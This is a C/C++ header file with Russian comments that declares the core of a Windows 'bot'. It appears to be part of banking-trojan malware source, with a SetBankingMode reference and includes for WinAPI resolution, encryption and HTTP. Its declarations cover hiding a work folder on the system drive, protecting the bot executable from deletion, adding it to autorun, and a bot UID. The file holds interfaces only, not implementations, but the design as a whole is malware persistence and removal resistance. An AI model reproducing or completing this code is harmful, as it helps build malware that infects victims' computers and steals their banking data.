//---------------------------------------------------------------------------
//  Основной модуль бота, объеденяющий в себе базовые модули
//---------------------------------------------------------------------------

#ifndef BotCoreH
#define BotCoreH
//---------------------------------------------------------------------------

// подключаем модуль для работы с WINAPI в боте
#include "GetApi.h"

// Модуль для работы с памятью
#include "Memory.h"

// Модуль для работы со строками
#include "Strings.h"

// Модуль шифрования
#include "Crypt.h"

// Базовые настройки бота
#include "Config.h"


// Модуль базовых утилит
#include "Utils.h"

// Модуль для работы с HTTP
#include "BotHTTP.h"


//*****************************************************************************
//  Этот модуль НЕ содержится в общих исходниках
//  Еего должен реализовывать каждый проект
//  Модуль подключает в себе все дополнительные модули
//  меняющие функционал бота
//  Да-же если не планируется использование дополнительных
//  модулей проект всё равно должен включать этот модуль
//*****************************************************************************
#include "Modules.h"



/*++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*/


//*****************************************************************************
//  Bot - Методы для организации работы ядра бота
//*****************************************************************************
namespace BOT
{
	//----------------------------------------------------
	//  Initialize - Функция инициализирует глобальные
	//				 настройки бота
	//----------------------------------------------------
    void Initialize();


	//----------------------------------------------------
	// Функция возвращает рабочий каталог бота
	//
	// SubDir - подкатолог, который будет добавлен к
	//          полученному результату.
	//          НЕ должен начинаться со слеша, но ДОЛЖЕН
	//			им заканчиваться
	//
	// FileName - Имя файла, которое будет добавлено к
	//			  полученному каталогу
	//----------------------------------------------------
	PCHAR GetWorkPath(PCHAR SubDir = NULL, PCHAR FileName = NULL);

	//----------------------------------------------------
	//  GetWorkPathInSysDrive - Аналог функции GetWorkPath.
	//  	Главное от личие от нёэ в том, что пусть
	//      создаётся в корне системного диска
	//----------------------------------------------------
	PCHAR GetWorkPathInSysDrive(PCHAR SubDir = NULL, PCHAR FileName = NULL);

	//----------------------------------------------------
	//  GetWorkFolderHash - Функция возвращает хэш
	//  	                   имени рабочей папки
	//----------------------------------------------------
	DWORD GetWorkFolderHash();

	//----------------------------------------------------
	//  GetBotFileName - Функция возвращает имя файла бота
	//----------------------------------------------------
	PCHAR GetBotExeName();

	//----------------------------------------------------
	//  GetBotExeNameHash - Функция возвращает хэш имя
	//						файла бота
	//----------------------------------------------------
    DWORD GetBotExeNameHash();

	//----------------------------------------------------
	//  GetBotFullExeName - Функция возвращает полное имя
	//						файла бота
	//----------------------------------------------------
	PCHAR GetBotFullExeName();

	//----------------------------------------------------
	// Функция защищает ехе бота от удаления
	//----------------------------------------------------
	void Protect(PCHAR FileName);

	//----------------------------------------------------
	// Функция снимает защиту с ехе файла бота
	//----------------------------------------------------
	void Unprotect();

	//----------------------------------------------------
	// AddToAutoRun - Функция добавляет бот в автозагрузку
	//----------------------------------------------------
	bool AddToAutoRun(PCHAR FileName);

}

//уид бота, инициализируется в функции BOT::Initialize(), также меняется если будет изменен префикс 
//через функцию SetBankingMode()
extern char BOT_UID[128];

//---------------------------------------------------------------------------
#endif
